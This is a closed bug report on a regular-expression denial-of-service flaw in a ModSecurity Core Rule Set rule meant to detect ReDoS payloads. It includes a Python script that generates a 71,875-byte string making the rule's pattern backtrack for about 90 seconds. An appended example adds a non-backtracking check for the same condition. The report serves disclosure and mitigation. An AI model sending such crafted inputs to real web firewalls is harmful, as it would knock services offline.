Closed
Description
MODSEC-119: The first rule of the modsecurity_crs_41_phpids_filters.conf file, called
"Possible RegEx DoS Payload", is (ironically) vulnerable to a denial of
service. The following Python script generates a string of 71875 bytes,
which is not matched by the pattern:
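#!/usr/bin/env python
n = 32      # copies of each block
s = 'aa'    # innermost block
buf = s
x = 'b'
# Three nesting levels: n copies of the current block, then a near copy
# whose last character differs.
for i in range(0, 3):
    for j in range(0, n-1):
        buf += s
    buf += s[:-1] + x
    x = chr(ord(x) + 1)
    s = buf
# 2 * 33**3 = 71874 characters plus the trailing newline
print(buf)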
This string takes a lot of time to not be matched by libpcre:
% ./redos.py | time pcregrep '(?:(.{2,})\1{32,})'
81,22s user 0,03s system 89% cpu 1:30,67 total
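An added example, not part of the report or of the ModSecurity/CRS code: a check for the same condition as the rule's pattern (a block of at least 2 characters followed by at least 32 copies of itself) that uses a plain scan instead of a backtracking backreference, so its cost is bounded by roughly n²/33 character comparisons for an n-character input. The function name and the sample inputs are constructed for illustration.

```python
import re

# The rule's pattern as quoted in the report: a block of >= 2 characters
# followed by >= 32 copies of itself, matched with a backreference.
RULE = re.compile(r'(?:(.{2,})\1{32,})')

def has_repeated_block(data, min_len=2, repeats=32):
    """Same yes/no answer as the pattern, without backtracking.

    A block X of length L followed by `repeats` copies of X is a window of
    (repeats + 1) * L characters with period L, i.e. repeats * L consecutive
    positions k where data[k] == data[k + L]. '.' never matches a newline,
    so a newline resets the run.
    """
    n = len(data)
    for L in range(min_len, n // (repeats + 1) + 1):
        need = repeats * L
        run = 0
        for k in range(n - L):
            if data[k] == data[k + L] and data[k] != '\n':
                run += 1
                if run >= need:
                    return True
            else:
                run = 0
    return False

# Constructed sample inputs (not taken from the report).
SAMPLES = {
    "33 copies of 'ab'": "ab" * 33,
    "32 copies, then a near miss": "ab" * 32 + "ac",
    "66 identical characters": "a" * 66,
    "65 identical characters": "a" * 65,
    "newline inside every block": "a\n" * 33,
}

def compare(samples=SAMPLES):
    """Map each sample name to (scan result, regex result)."""
    return {name: (has_repeated_block(text), RULE.search(text) is not None)
            for name, text in samples.items()}

if __name__ == "__main__":
    for name, (scan, regex) in compare().items():
        print("%-30s scan=%-5s regex=%s" % (name, scan, regex))
```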